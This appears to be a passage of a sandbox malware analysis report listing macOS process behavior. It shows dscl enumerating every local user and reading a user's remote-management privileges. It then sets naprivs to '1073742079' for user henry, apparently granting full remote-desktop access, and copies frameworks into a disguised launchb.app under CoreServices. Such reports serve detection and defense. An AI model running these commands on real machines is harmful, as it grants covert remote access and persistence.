| Source: /usr/bin/perl5.18 (PID: 606) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_mcxalr' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 607) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_mdnsresponder' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 608) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_mobileasset' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 609) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_mysql' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 610) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_netbios' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 611) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_netstatistics' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 612) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_networkd' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 613) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_nsurlsessiond' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 614) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_nsurlstoraged' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 615) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_ondemand' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 616) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_postfix' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 617) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_postgres' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 618) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_qtss' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 619) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_sandbox' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 620) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_screensaver' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 621) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_scsd' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 622) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_securityagent' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 623) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_serialnumberd' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 624) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_softwareupdate' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 625) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_spotlight' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 626) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_sshd' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 627) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_svn' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 628) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_taskgated' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 629) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_teamsserver' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 630) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_timed' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 631) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_timezone' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 632) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_tokend' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 633) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_trustevaluationagent' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 634) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_unknown' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 635) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_update_sharing' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 636) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_usbmuxd' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 637) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_uucp' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 638) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_warmd' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 639) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_webauthserver' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 640) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_windowserver' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 641) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_www' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 642) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_wwwproxy' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 643) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_xcsbuildagent' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 644) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_xcscredserver' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 645) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_xserverdocs' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 646) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/henry' uid | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 648) | Shell command executed: sh -c /bin/launchctl list com.apple.screensharing 2>/dev/null | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 665) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/henry' naprivs 2>/dev/null | Jump to behavior |
| Source: /usr/bin/perl5.18 (PID: 667) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -create '/Local/Target/Users/henry' naprivs '1073742079' | Jump to behavior |
| Source: /bin/sh (PID: 548) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -list /Local/Target/Users | Jump to behavior |
| Source: /bin/sh (PID: 549) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_amavisd uid | Jump to behavior |
| Source: /bin/sh (PID: 550) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_analyticsd uid | Jump to behavior |
| Source: /bin/sh (PID: 551) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_appleevents uid | Jump to behavior |
| Source: /bin/sh (PID: 552) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_applepay uid | Jump to behavior |
| Source: /bin/sh (PID: 553) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_appowner uid | Jump to behavior |
| Source: /bin/sh (PID: 554) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_appserver uid | Jump to behavior |
| Source: /bin/sh (PID: 555) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_appstore uid | Jump to behavior |
| Source: /bin/sh (PID: 556) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_ard uid | Jump to behavior |
| Source: /bin/sh (PID: 557) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_assetcache uid | Jump to behavior |
| Source: /bin/sh (PID: 558) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_astris uid | Jump to behavior |
| Source: /bin/sh (PID: 559) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_atsserver uid | Jump to behavior |
| Source: /bin/sh (PID: 560) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_avbdeviced uid | Jump to behavior |
| Source: /bin/sh (PID: 561) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_calendar uid | Jump to behavior |
| Source: /bin/sh (PID: 562) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_captiveagent uid | Jump to behavior |
| Source: /bin/sh (PID: 563) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_ces uid | Jump to behavior |
| Source: /bin/sh (PID: 564) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_clamav uid | Jump to behavior |
| Source: /bin/sh (PID: 565) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_cmiodalassistants uid | Jump to behavior |
| Source: /bin/sh (PID: 566) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_coreaudiod uid | Jump to behavior |
| Source: /bin/sh (PID: 567) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_coremediaiod uid | Jump to behavior |
| Source: /bin/sh (PID: 568) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_ctkd uid | Jump to behavior |
| Source: /bin/sh (PID: 569) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_cvmsroot uid | Jump to behavior |
| Source: /bin/sh (PID: 570) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_cvs uid | Jump to behavior |
| Source: /bin/sh (PID: 571) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_cyrus uid | Jump to behavior |
| Source: /bin/sh (PID: 572) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_datadetectors uid | Jump to behavior |
| Source: /bin/sh (PID: 573) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_devdocs uid | Jump to behavior |
| Source: /bin/sh (PID: 574) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_devicemgr uid | Jump to behavior |
| Source: /bin/sh (PID: 575) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_displaypolicyd uid | Jump to behavior |
| Source: /bin/sh (PID: 576) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_distnote uid | Jump to behavior |
| Source: /bin/sh (PID: 577) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_dovecot uid | Jump to behavior |
| Source: /bin/sh (PID: 578) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_dovenull uid | Jump to behavior |
| Source: /bin/sh (PID: 579) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_dpaudio uid | Jump to behavior |
| Source: /bin/sh (PID: 580) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_eppc uid | Jump to behavior |
| Source: /bin/sh (PID: 581) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_findmydevice uid | Jump to behavior |
| Source: /bin/sh (PID: 582) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_fpsd uid | Jump to behavior |
| Source: /bin/sh (PID: 583) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_ftp uid | Jump to behavior |
| Source: /bin/sh (PID: 584) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_gamecontrollerd uid | Jump to behavior |
| Source: /bin/sh (PID: 585) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_geod uid | Jump to behavior |
| Source: /bin/sh (PID: 586) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_hidd uid | Jump to behavior |
| Source: /bin/sh (PID: 587) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_iconservices uid | Jump to behavior |
| Source: /bin/sh (PID: 588) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_installassistant uid | Jump to behavior |
| Source: /bin/sh (PID: 589) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_installer uid | Jump to behavior |
| Source: /bin/sh (PID: 590) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_jabber uid | Jump to behavior |
| Source: /bin/sh (PID: 591) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_kadmin_admin uid | Jump to behavior |
| Source: /bin/sh (PID: 592) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_kadmin_changepw uid | Jump to behavior |
| Source: /bin/sh (PID: 593) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krb_anonymous uid | Jump to behavior |
| Source: /bin/sh (PID: 594) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krb_changepw uid | Jump to behavior |
| Source: /bin/sh (PID: 595) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krb_kadmin uid | Jump to behavior |
| Source: /bin/sh (PID: 596) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krb_kerberos uid | Jump to behavior |
| Source: /bin/sh (PID: 597) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krb_krbtgt uid | Jump to behavior |
| Source: /bin/sh (PID: 598) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krbfast uid | Jump to behavior |
| Source: /bin/sh (PID: 599) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krbtgt uid | Jump to behavior |
| Source: /bin/sh (PID: 600) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_launchservicesd uid | Jump to behavior |
| Source: /bin/sh (PID: 601) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_lda uid | Jump to behavior |
| Source: /bin/sh (PID: 602) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_locationd uid | Jump to behavior |
| Source: /bin/sh (PID: 603) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_lp uid | Jump to behavior |
| Source: /bin/sh (PID: 604) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_mailman uid | Jump to behavior |
| Source: /bin/sh (PID: 605) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_mbsetupuser uid | Jump to behavior |
| Source: /bin/sh (PID: 606) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_mcxalr uid | Jump to behavior |
| Source: /bin/sh (PID: 607) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_mdnsresponder uid | Jump to behavior |
| Source: /bin/sh (PID: 608) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_mobileasset uid | Jump to behavior |
| Source: /bin/sh (PID: 609) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_mysql uid | Jump to behavior |
| Source: /bin/sh (PID: 610) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_netbios uid | Jump to behavior |
| Source: /bin/sh (PID: 611) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_netstatistics uid | Jump to behavior |
| Source: /bin/sh (PID: 612) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_networkd uid | Jump to behavior |
| Source: /bin/sh (PID: 613) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_nsurlsessiond uid | Jump to behavior |
| Source: /bin/sh (PID: 614) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_nsurlstoraged uid | Jump to behavior |
| Source: /bin/sh (PID: 615) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_ondemand uid | Jump to behavior |
| Source: /bin/sh (PID: 616) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_postfix uid | Jump to behavior |
| Source: /bin/sh (PID: 617) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_postgres uid | Jump to behavior |
| Source: /bin/sh (PID: 618) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_qtss uid | Jump to behavior |
| Source: /bin/sh (PID: 619) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_sandbox uid | Jump to behavior |
| Source: /bin/sh (PID: 620) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_screensaver uid | Jump to behavior |
| Source: /bin/sh (PID: 621) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_scsd uid | Jump to behavior |
| Source: /bin/sh (PID: 622) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_securityagent uid | Jump to behavior |
| Source: /bin/sh (PID: 623) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_serialnumberd uid | Jump to behavior |
| Source: /bin/sh (PID: 624) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_softwareupdate uid | Jump to behavior |
| Source: /bin/sh (PID: 625) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_spotlight uid | Jump to behavior |
| Source: /bin/sh (PID: 626) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_sshd uid | Jump to behavior |
| Source: /bin/sh (PID: 627) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_svn uid | Jump to behavior |
| Source: /bin/sh (PID: 628) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_taskgated uid | Jump to behavior |
| Source: /bin/sh (PID: 629) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_teamsserver uid | Jump to behavior |
| Source: /bin/sh (PID: 630) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_timed uid | Jump to behavior |
| Source: /bin/sh (PID: 631) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_timezone uid | Jump to behavior |
| Source: /bin/sh (PID: 632) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_tokend uid | Jump to behavior |
| Source: /bin/sh (PID: 633) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_trustevaluationagent uid | Jump to behavior |
| Source: /bin/sh (PID: 634) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_unknown uid | Jump to behavior |
| Source: /bin/sh (PID: 635) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_update_sharing uid | Jump to behavior |
| Source: /bin/sh (PID: 636) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_usbmuxd uid | Jump to behavior |
| Source: /bin/sh (PID: 637) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_uucp uid | Jump to behavior |
| Source: /bin/sh (PID: 638) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_warmd uid | Jump to behavior |
| Source: /bin/sh (PID: 639) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_webauthserver uid | Jump to behavior |
| Source: /bin/sh (PID: 640) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_windowserver uid | Jump to behavior |
| Source: /bin/sh (PID: 641) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_www uid | Jump to behavior |
| Source: /bin/sh (PID: 642) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_wwwproxy uid | Jump to behavior |
| Source: /bin/sh (PID: 643) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_xcsbuildagent uid | Jump to behavior |
| Source: /bin/sh (PID: 644) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_xcscredserver uid | Jump to behavior |
| Source: /bin/sh (PID: 645) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_xserverdocs uid | Jump to behavior |
| Source: /bin/sh (PID: 646) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/henry uid | Jump to behavior |
| Source: /bin/sh (PID: 666) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/henry naprivs | Jump to behavior |
| Source: /bin/cp (PID: 674) | Framework directory file created: /System/Library/CoreServices/launchb.app/Contents/Frameworks/Alamofire.framework/Versions/A/Alamofire | Jump to behavior |
| Source: /bin/cp (PID: 674) | Framework directory file created: /System/Library/CoreServices/launchb.app/Contents/Frameworks/Alamofire.framework/Versions/A/Resources/Info.plist | Jump to behavior |
| Source: /bin/cp (PID: 674) | Framework directory file created: /System/Library/CoreServices/launchb.app/Contents/Frameworks/CryptoSwift.framework/Versions/A/CryptoSwift | Jump to behavior |
| Source: /bin/cp (PID: 674) | Framework directory file created: /System/Library/CoreServices/launchb.app/Contents/Frameworks/CryptoSwift.framework/Versions/A/Resources/Info.plist | Jump to behavior |
| Source: /bin/cp (PID: 674) | Framework directory file created: /System/Library/CoreServices/launchb.app/Contents/Frameworks/libswiftAppKit.dylib | Jump to behavior |
| Source: /bin/cp (PID: 674) | Framework directory file created: /System/Library/CoreServices/launchb.app/Contents/Frameworks/libswiftCore.dylib | Jump to behavior |
| Source: /bin/cp (PID: 674) | Framework directory file created: /System/Library/CoreServices/launchb.app/Contents/Frameworks/libswiftCoreData.dylib | Jump to behavior |
| Source: /bin/cp (PID: 674) | Framework directory file created: /System/Library/CoreServices/launchb.app/Contents/Frameworks/libswiftCoreGraphics.dylib | Jump to behavior |
| Source: /bin/cp (PID: 674) | Framework directory file created: /System/Library/CoreServices/launchb.app/Contents/Frameworks/libswiftCoreImage.dylib | Jump to behavior |
| Source: /bin/cp (PID: 674) | Framework directory file created: /System/Library/CoreServices/launchb.app/Contents/Frameworks/libswiftDarwin.dylib | Jump to behavior |
| Source: /bin/cp (PID: 674) | Framework directory file created: /System/Library/CoreServices/launchb.app/Contents/Frameworks/libswiftDispatch.dylib | Jump to behavior |
| Source: /bin/cp (PID: 674) | Framework directory file created: /System/Library/CoreServices/launchb.app/Contents/Frameworks/libswiftFoundation.dylib | Jump to behavior |
| Source: /bin/cp (PID: 674) | Framework directory file created: /System/Library/CoreServices/launchb.app/Contents/Frameworks/libswiftObjectiveC.dylib | Jump to behavior |
